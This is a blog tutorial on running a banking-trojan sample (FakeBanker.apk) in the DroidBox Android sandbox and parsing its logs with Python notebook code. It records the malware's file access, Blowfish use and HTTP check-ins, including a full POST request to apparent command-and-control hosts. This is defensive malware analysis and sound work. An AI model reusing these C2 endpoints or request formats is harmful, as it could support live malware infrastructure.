Android Dynamic Code Analysis - Mastering DroidBox

In this article I’ll have a a closer look at DroidBox which provides a mobile sandbox to look at Android applications. In the previous post I’ve dealt with static code analysis. This time will start running our malicious application and look at the “noise” it generates. That would be:

file system access
network activity
interaction with the operating system
interaction with other applications
etc.

DroidBox is very easy to use and consists of an own system image and kernel meant to log one applications activities. Using adb logcat DroidBox will look for certain debug messages and collect anything related to the monitored app. However I must say that loged data isn’t always complete. Sometimes you’ll get only a striped version of the data which caused the activity. In that case it’s almost impossible e.g. to have a deep look at the network traffic (especially HTTP). You won’t be able to construct a full request-response-sequence due to missing data. Nevertheless you can use DroidBox to get an overview of malicious activities triggered by the app. For a more technical analysis of the data you’ll need additional tools (more to come in future posts).

Requirements for DroidBox

First you’ll have to install some requirements DroidBox needs. First make sure you have the system relevant packages installed:

1

root@kali:~# apt-get install python-virtualenv libatlas-dev liblapack-dev libblas-dev

You’ll need those in order to use scipy, matplotlib and numpy along with Droidbox. Now create a virtual environment and install python dependencies:

1
2
3
4
5


root@kali:~/work/apk# mkdir env
root@kali:~/work/apk# virtualenv env
...
root@kali:~/work/apk# source env/bin/activate
(env)root@kali:~/work/apk# pip install numpy scipy matplotlib

Install Droidbox

Download the package:

1

(env)root@kali:~/work/apk# wget https://droidbox.googlecode.com/files/DroidBox411RC.tar.gz

Setup PATH

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


import os
import sys

# Setup new PATH
old_path = os.environ['PATH']
new_path = old_path + ":" + "/root/work/apk/SDK/android-sdk-linux/tools:/root/work/apk/SDK/android-sdk-linux/platform-tools:/root/work/apk/SDK/android-sdk-linux/build-tools/19.1.0"
os.environ['PATH'] = new_path

# Change working directory
os.chdir("/root/work/apk/DroidBox_4.1.1/")

Setup IPython settings

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21


%pylab inline
import binascii
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
import datetime as dt
import time
import ipy_table
from IPython.display import display_pretty, display_html, display_jpeg, display_png, display_json, display_latex, display_svg
from IPython.display import HTML
from IPython.core.magic import register_cell_magic, Magics, magics_class, cell_magic
import jinja2

# Ipython settings
pd.set_option('display.height', 1000)
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_columns', 500)
pd.set_option('display.max_colwidth', 100)
pd.set_option('display.width', 1000)
pd.set_option('display.column_space', 1000)

Populating the interactive namespace from numpy and matplotlib
height has been deprecated.

External extensions

1
2
3
4
5


# Install
%install_ext https://raw.githubusercontent.com/dorneanu/ipython/master/extensions/diagmagic.py
    
# Then load extensions
%load_ext diagmagic

Installed diagmagic.py. To use it, type:
  %load_ext diagmagic

Utilities

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59


from IPython import display
from IPython.core.magic import register_cell_magic, Magics, magics_class, cell_magic
import jinja2

# <!-- collapse=True -->
def df2table(df):
    """ Outputs a DataFrame as a table using ipy_table """
    entries = [list(i) for i in df.itertuples()]
    
    # Extract table header
    header = list(df.columns)
    
    # Add index to header
    header.insert(0, df.index.name)
    
    # Insert header at 1st place
    entries.insert(0, header)

    return ipy_table.make_table(entries)

# Create jinja cell magic (http://nbviewer.ipython.org/urls/gist.github.com/bj0/5343292/raw/23a0845ee874827e3635edb0bf5701710a537bfc/jinja2.ipynb)
@magics_class
class JinjaMagics(Magics):
    '''Magics class containing the jinja2 magic and state'''
    
    def __init__(self, shell):
        super(JinjaMagics, self).__init__(shell)
        
        # create a jinja2 environment to use for rendering
        # this can be modified for desired effects (ie: using different variable syntax)
        self.env = jinja2.Environment(loader=jinja2.FileSystemLoader('.'))
        
        # possible output types
        self.display_functions = dict(html=display.HTML, 
                                      latex=display.Latex,
                                      json=display.JSON,
                                      pretty=display.Pretty,
                                      display=display.display)

    
    @cell_magic
    def jinja(self, line, cell):
        '''
        jinja2 cell magic function.  Contents of cell are rendered by jinja2, and 
        the line can be used to specify output type.

        ie: "%%jinja html" will return the rendered cell wrapped in an HTML object.
        '''
        f = self.display_functions.get(line.lower().strip(), display.display)
        
        tmp = self.env.from_string(cell)
        rend = tmp.render(dict((k,v) for (k,v) in self.shell.user_ns.items() 
                                        if not k.startswith('_') and k not in self.shell.user_ns_hidden))
        
        return f(rend)
        
    
ip = get_ipython()
ip.register_magics(JinjaMagics)

Create Android Virtual Device (ADV)

Now you’ll have to install an Android device virtually in order to analyze the APK. Supposing you have installed the SDK in the previous step now you should have some targets available on your machine. If not (that was my case) then make sure you have a X session running and run android from the console. In my case I’ve fired up vnc and connected to the Kali machine.

This is what I’ve got:

1
2


%%bash
android list targets | head -n 10

Available Android targets:
----------
id: 1 or "android-16"
     Name: Android 4.1.2
     Type: Platform
     API level: 16
     Revision: 4
     Skins: WXGA800-7in, WQVGA400, WVGA800 (default), WXGA800, HVGA, WSVGA, WVGA854, WQVGA432, WXGA720, QVGA
 Tag/ABIs : default/armeabi-v7a
----------

Now we create the AVD using following command:

1
2
3
4
5
6
7
8
9


# android create avd --abi default/armeabi-v7a -n android-4.1.2-droidbox -t 1 -c 1000M
Android 4.1.2 is a basic Android platform.
Do you wish to create a custom hardware profile [no]
Created AVD 'android-4.1.2-droidbox' based on Android 4.1.2, ARM (armeabi-v7a) processor,
with the following hardware config:
hw.lcd.density=240
hw.ramSize=512
hw.sdCard=yes
vm.heapSize=48

1
2


%%bash
android list avd

Available Android Virtual Devices:
    Name: android-4.1.2-droidbox
    Path: /root/.android/avd/android-4.1.2-droidbox.avd
  Target: Android 4.1.2 (API level 16)
 Tag/ABI: default/armeabi-v7a
    Skin: WVGA800
  Sdcard: 1000M

Start the emulator

In DroidBoxs package directory you’ll find startemu.sh. Open it and add your favourite parameters.

1
2


%%bash
cat startemu.sh

#!/usr/bin/env bash

emulator -avd $1 -system images/system.img -ramdisk images/ramdisk.img -wipe-data -prop dalvik.vm.execution-mode=int:portable &

Afterwards make sure you have a X session and run the emulator with your previously created AVD:

1
2


(env)root@kali:~/work/apk/DroidBox# ./startemu.sh android-4.1.2-droidbox
...

Now you should see your emulator booting …

Run DroidBox

1

!./droidbox.sh /root/work/apk/DroidBox_4.1.1/APK/FakeBanker.apk

[H[2J ____                        __  ____
/\  _`\               __    /\ \/\  _`\
\ \ \/\ \  _ __  ___ /\_\   \_\ \ \ \L\ \   ___   __  _
 \ \ \ \ \/\`'__\ __`\/\ \  /'_` \ \  _ <' / __`\/\ \/'\
  \ \ \_\ \ \ \/\ \L\ \ \ \/\ \L\ \ \ \L\ \ \L\ \/>  </
   \ \____/\ \_\ \____/\ \_\ \___,_\ \____/ \____//\_/\_\
    \/___/  \/_/\/___/  \/_/\/__,_ /\/___/ \/___/ \//\/_/
Waiting for the device...
Installing the application /root/work/apk/DroidBox_4.1.1/APK/FakeBanker.apk...
Running the component com.gmail.xpack/com.gmail.xpack.MainActivity...
Starting the activity com.gmail.xpack.MainActivity...
Application started
Analyzing the application during infinite time seconds...
^C

DroidBox will then listen for activities until you kill it by ^C.

Meanwhile I was interacting with the APP and saw that DroidBox was collecting the logs during the interacttions. DroidBox will output its results as a JSON file. I’ve uploaded the results to pastebin.com. Now let’s have some fun and take a look at the results.

Before starting analyzing the output keep in mind that:

[…] all data received/sent, read/written are shown in hexadecimal since the handled data can contain binary data.

(Source: https://github.com/floe/mobile-sandbox/blob/master/DroidBox_4.1.1/scripts/droidbox.py)

Results analysis

First let’s download the data and let python parse it

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# <!-- collapse=True -->
import json
import urllib
url = "http://pastebin.com/raw.php?i=7YSb3EMW"

# Load data
jsonurl = urllib.urlopen(url)
result = json.loads(jsonurl.read())

# Show dictionary keys
result.keys()

[u'apkName',
 u'enfperm',
 u'opennet',
 u'cryptousage',
 u'sendsms',
 u'servicestart',
 u'sendnet',
 u'closenet',
 u'accessedfiles',
 u'fdaccess',
 u'dataleaks',
 u'recvnet',
 u'dexclass',
 u'hashes',
 u'recvsaction',
 u'phonecalls']

So we have diffenrent categories of activities we can look at. After analyzing the JSON content I’ve come to following most important activities.

File system activities

Let’s have a look at the file system access actions triggered by the application. Due to DroidBox limitations I couldn’t have a look at the complete raw data.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['fdaccess'].keys()]

# Create list of accessed files entries
accessed_files = [i[1] for i in result['fdaccess'].items()]

# Create dataframe
df_accessedfiles = pd.DataFrame(accessed_files, index=timestamps)
df_accessedfiles.sort(inplace=True)
df_accessedfiles.index.name='Timestamp'

# Unhexlify data
unhexed_data = [binascii.unhexlify(d) for d in df_accessedfiles['data']]
df_accessedfiles['rawdata'] = unhexed_data

df2table(df_accessedfiles[['operation', 'path', 'rawdata']].reset_index())
#ipy_table.apply_theme('basic')
df_accessedfiles[['operation', 'path', 'rawdata']].reset_index()

	Timestamp	operation	path	rawdata
0	0:00:03	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
1	0:00:04	read	/proc/1184/cmdline	com.gmail.xpack��p/FakeBanker.apk�ain...
2	0:00:04	read	/proc/1197/cmdline	logcat�DroidBox:W�dalvikvm:W�ActivityManager:I��p/FakeBanker.apk�ain...
3	0:00:08	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
4	0:00:09	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
5	0:00:10	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
6	0:00:10	read	/proc/1205/cmdline	com.gmail.xpack:remote��p/FakeBanker.apk�ain...
7	0:00:36	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
8	0:00:36	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...
9	0:01:05	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
10	0:15:06	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
11	0:15:06	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
12	0:15:24	read	/dev/urandom	E0��2qV��4!=�Nd��V
13	0:15:27	read	/proc/1239/cmdline	com.android.exchange��p/FakeBanker.apk�ain...
14	0:15:35	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
15	0:15:37	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
16	0:15:37	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
17	0:15:58	read	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
18	0:16:00	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
19	0:16:01	write	/data/data/com.gmail.xpack/shared_prefs/MainPref.xml	<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<int name="PASSADDED" value="10...
20	0:16:10	read	/proc/wakelocks	name\tcount\texpire_count\twake_count\tactive_since\ttotal_time\tsleep_time\tmax_time\tlast_chan...

Network activities

Opened connections (opennet)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16


# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['opennet'].keys()]

# Create list of accessed files entries
open_net = [i[1] for i in result['opennet'].items()]

# Create dataframe
df_opennet = pd.DataFrame(open_net, index=timestamps)
df_opennet.sort(inplace=True)
df_opennet.index.name='Timestamp'


#df2table(df_opennet)
#ipy_table.apply_theme('basic')
df_opennet.reset_index()

	Timestamp	desthost	destport	fd
0	0:00:08	80.74.128.17	80	17
1	0:15:06	80.74.128.17	80	23
2	0:15:36	80.74.128.17	80	28
3	0:16:00	80.74.128.17	80	33

Sent data (sendnet)

Here you can have a look at the sent data. Again: The POST/GET requests are not fully complete.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['sendnet'].keys()]
# Create list of accessed files entries
send_net = [i[1] for i in result['sendnet'].items()]

# Create dataframe
df_sendnet = pd.DataFrame(send_net, index=timestamps)
df_sendnet.sort(inplace=True)
df_sendnet.index.name='Timestamp'

# Unhexlify data
unhexed_data = [binascii.unhexlify(d) for d in df_sendnet['data']]
df_sendnet['rawdata'] = unhexed_data

#df2table(df_sendnet[['desthost', 'destport', 'fd', 'operation', 'type', 'rawdata']])
#ipy_table.apply_theme('basic')
df_sendnet[['desthost', 'destport', 'fd', 'operation', 'type', 'rawdata']].reset_index()

	Timestamp	desthost	destport	fd	operation	type	rawdata
0	0:00:08	80.74.128.17	80	17	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...
1	0:15:06	80.74.128.17	80	23	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...
2	0:15:36	80.74.128.17	80	28	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...
3	0:16:00	80.74.128.17	80	33	send	net write	POST /images/1.php HTTP/1.1\r\nUser-agent: Mozilla/4.76 (Java; U;Linux armv7l 2.6.29-gc497e41; r...

Received data (recvnet)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19


# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['recvnet'].keys()]

# Create list of accessed files entries
recv_net = [i[1] for i in result['recvnet'].items()]

# Create dataframe
df_recvnet = pd.DataFrame(recv_net, index=timestamps)
df_recvnet.sort(inplace=True)
df_recvnet.index.name='Timestamp'

# Unhexlify data
unhexed_data = [binascii.unhexlify(d) for d in df_recvnet['data']]
df_recvnet['rawdata'] = unhexed_data

#df2table(df_recvnet[['host', 'port', 'type', 'rawdata']])
#ipy_table.apply_theme('basic')
df_recvnet[['host', 'port', 'type', 'rawdata']].reset_index()

	Timestamp	host	port	type	rawdata
0	0:00:08	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\nContent-...
1	0:00:08	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
2	0:15:06	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
3	0:15:06	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:44:36 GMT\r\nServer: Apache\r\nContent-...
4	0:15:36	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:45:06 GMT\r\nServer: Apache\r\nContent-...
5	0:15:36	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...
6	0:16:00	80.74.128.17	80	net read	HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:45:30 GMT\r\nServer: Apache\r\nContent-...
7	0:16:00	80.74.128.17	80	net read	x=10\r\nConnection: Keep-Alive\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE H...

Requests sequence

Since I was not able to get the full contents of the POST/GET requests (and their equivalent responses), I had to rely on the information found here. Below is a short sequence diagramm describing the general process of the communication. Keep in mind that the sequence only tries to give you a short overview of the data exchange between the process and the webserver.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12


%%seqdiag
# <!-- collapse=True -->
seqdiag {
  application  -> citroen-club.ch [label = "POST /images/1.php HTTP/1.1"];
  application <-- citroen-club.ch [label = "HTTP/1.1 406 Not Acceptable", leftnote= ""];
  application --> best-invest-int.com [label = "POST /gallery/3.php HTTP/1.1", note = "POST data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&rid=25"];
  application <-- best-invest-int.com [label = "HTTP/1.1 403 Forbidden"];
  application --> best-invest-int.com [label = "POST /gallery/4.php HTTP/1.1", note = "POST data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&LogCode=CONF&LogText=Get+config+data+from+server"];
  application <-- best-invest-int.com [label = "HTTP/1.1 403 Forbidden"];
  application --> best-invest-int.com [label = "POST /gallery/4.php HTTP/1.1", note = "POST data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&LogCode=DATA&LogText=Send+data+to+server&"];
  application <-- best-invest-int.com [label = "..."];
}

png

And now a complete request/response pair:

Request:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


POST /gallery/4.php HTTP/1.1
User-agent: Mozilla/4.76 (Java; U;Linux i686 3.0.36-android-x86-eeepc+; ru; The Android Project 0)
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Pragma: no-cache
Host: best-invest-int.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 86
Data Raw: 64 61 74 61 3d 55 32 6c 74 55 33 52 68 64 47 55 67 50 53 42 4f 54 31 51 67 55 6b 56 42 52 46 6b 67 43 67 25 33 44 25 33 44 25 30 41 26 4c 6f 67 43 6f 64 65 3d 43 4f 4e 46 26 4c 6f 67 54 65 78 74 3d 43 68 65 63 6b 2b 70 75 6c 6c 2b 6f 66 66 2b 75 72 6c 73 26 
Data Ascii: data=U2ltU3RhdGUgPSBOT1QgUkVBRFkgCg%3D%3D%0A&LogCode=CONF&LogText=Check+pull+off+urls&

Response:

1
2
3
4
5
6
7
8


HTTP/1.1 403 Forbidden
Date: Thu, 21 Nov 2013 12:37:26 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 299
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /gallery/4.phpon this server.</p><hr><address>Apache/2.2.3 (CentOS) Server at best-invest-int.com Port 80</address></body></html>

Crypto activities

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18


# <!-- collapse=True -->
# Convert timestamps to human readable time delta
timestamps = [str(datetime.timedelta(seconds=(round(float(i.encode("utf-8")))))) for i in result['cryptousage'].keys()]

# Create list of accessed files entries
crypto_usage = [i[1] for i in result['cryptousage'].items()]

# Create dataframe
df_cryptousage = pd.DataFrame(crypto_usage, index=timestamps)
df_cryptousage.sort(inplace=True)
df_cryptousage.index.name='Timestamp'

# Unhexlify data
#unhexed_data = [binascii.unhexlify(d) for d in df_recvnet['data']]
#df_recvnet['rawdata'] = unhexed_data

#df_recvnet[['host', 'port', 'type', 'rawdata']]
df_cryptousage.reset_index()

	Timestamp	algorithm	key	operation	type
0	0:00:09	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
1	0:15:06	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
2	0:15:36	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto
3	0:16:00	Blowfish	52, 101, 54, 54, 55, 54, 54, 101, 54, 98, 54, 97, 54, 99, 54, 101, 55, 54, 54, 98, 54, 97, 52, 9...	keyalgo	crypto

Activities chart

Now let’s have a look in which order the several activities took place. Below you’ll find a table containing the timestamp, operation and category of each specific activity (e.g. file system access, network read/write etc.)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


# <!-- collapse=True -->
# Create df
df_activities = pd.DataFrame(columns=[['Timestamp', 'Operation', 'Category']])

# file system access
accessed_files = df_accessedfiles.reset_index()[[0,3]]
accessed_files['Category'] = "file system"
accessed_files.columns = ['Timestamp', 'Operation', 'Category']

# network activities
network_open = df_opennet.reset_index()[[0]]
network_open['Operation'] = 'net open'
network_open['Category'] = 'network'
network_open.columns = ['Timestamp', 'Operation', 'Category']

network_sent = df_sendnet.reset_index()[[0,6]]
network_sent['Category'] = "network"
network_sent.columns = ['Timestamp', 'Operation', 'Category']

network_recv = df_recvnet.reset_index()[[0,4]]
network_recv['Category'] = "network"
network_recv.columns = ['Timestamp', 'Operation', 'Category']

# crpyto usage
crypto_usage = df_cryptousage.reset_index()[[0,1]]
crypto_usage['Category'] = "crypto"
crypto_usage.columns = ['Timestamp', 'Operation', 'Category']

# Merge data frames
df_activities = pd.concat([accessed_files, network_open, network_sent, network_recv, crypto_usage], ignore_index=True)
df_activities.sort('Timestamp', inplace=True)

# Convert to JSON
d = df_activities.to_json(orient='records')
json_data = json.dumps(json.loads(d), ensure_ascii=False).encode("utf-8")

df_activities

	Timestamp	Operation	Category
0	0:00:03	read	file system
1	0:00:04	read	file system
2	0:00:04	read	file system
3	0:00:08	read	file system
21	0:00:08	net open	network
25	0:00:08	net write	network
29	0:00:08	net read	network
30	0:00:08	net read	network
4	0:00:09	write	file system
37	0:00:09	Blowfish	crypto
5	0:00:10	write	file system
6	0:00:10	read	file system
7	0:00:36	write	file system
8	0:00:36	read	file system
9	0:01:05	read	file system
10	0:15:06	write	file system
11	0:15:06	write	file system
22	0:15:06	net open	network
26	0:15:06	net write	network
31	0:15:06	net read	network
32	0:15:06	net read	network
38	0:15:06	Blowfish	crypto
12	0:15:24	read	file system
13	0:15:27	read	file system
14	0:15:35	read	file system
23	0:15:36	net open	network
27	0:15:36	net write	network
33	0:15:36	net read	network
34	0:15:36	net read	network
39	0:15:36	Blowfish	crypto
15	0:15:37	write	file system
16	0:15:37	write	file system
17	0:15:58	read	file system
18	0:16:00	write	file system
24	0:16:00	net open	network
28	0:16:00	net write	network
35	0:16:00	net read	network
36	0:16:00	net read	network
40	0:16:00	Blowfish	crypto
19	0:16:01	write	file system
20	0:16:10	read	file system

A fancier overview …

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23


%%jinja html
<!-- collapse=True -->
<html>
<head>
  <script src="http://d3js.org/d3.v3.min.js"></script>
  <script src="http://dimplejs.org/dist/dimple.v2.1.0.min.js"></script>
<title>{{ title }}</title>
</head>
<body>
<div id="bar_chart"></div>
  <script type="text/javascript">
    var json_data  = {{ json_data }};
    var svg = dimple.newSvg("#bar_chart", 800, 800);
    var myChart = new dimple.chart(svg, json_data);
    myChart.setBounds(150, 50, 700, 680)
    myChart.addCategoryAxis("x", ["Category", "Operation"]);
    myChart.addCategoryAxis("y", "Timestamp");
    myChart.addSeries("Operation", dimple.plot.bar);
    myChart.addLegend(170, 10, 630, 20, "right");
    myChart.draw();
  </script>
</body>
</html>

A few observations:

file system access (both read and write) are taking place all the time
the crypto routines are apparently involved when sending data over internet or receiving data

Conclusion

I think DroidBox is a very good tool to deal with Android APKs and analyze their behaviour during run-time. It comes with a working mobile sandbox meant to inspect and monitor an applications activities. However during my analysis I had to rely on previous analysis since the results didn’t contain the full details. Not only the network traffic but also the contents read from files weren’t complete. In order to fully unterstand one malware I need complete details about its behaviour. For example I had following response from the server which is completely useless:

1

HTTP/1.1 406 Not Acceptable\r\nDate: Mon, 28 Jul 2014 13:29:38 GMT\r\nServer: Apache\r\nContent-...

Besides that I was indeed able to see that the application is reading from some file. But the delivered content was once again striped:

1

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>\n<map>\n<string name="DOWNLOADDOMAIN">c...

I hope the developers will see this as a vital necessity and update as soon as possible. Furthermore I’ll look forward to other mobile sandboxes which have data instrumentation capabilities. Next time I’ll have a deeper look at Androids DDMS.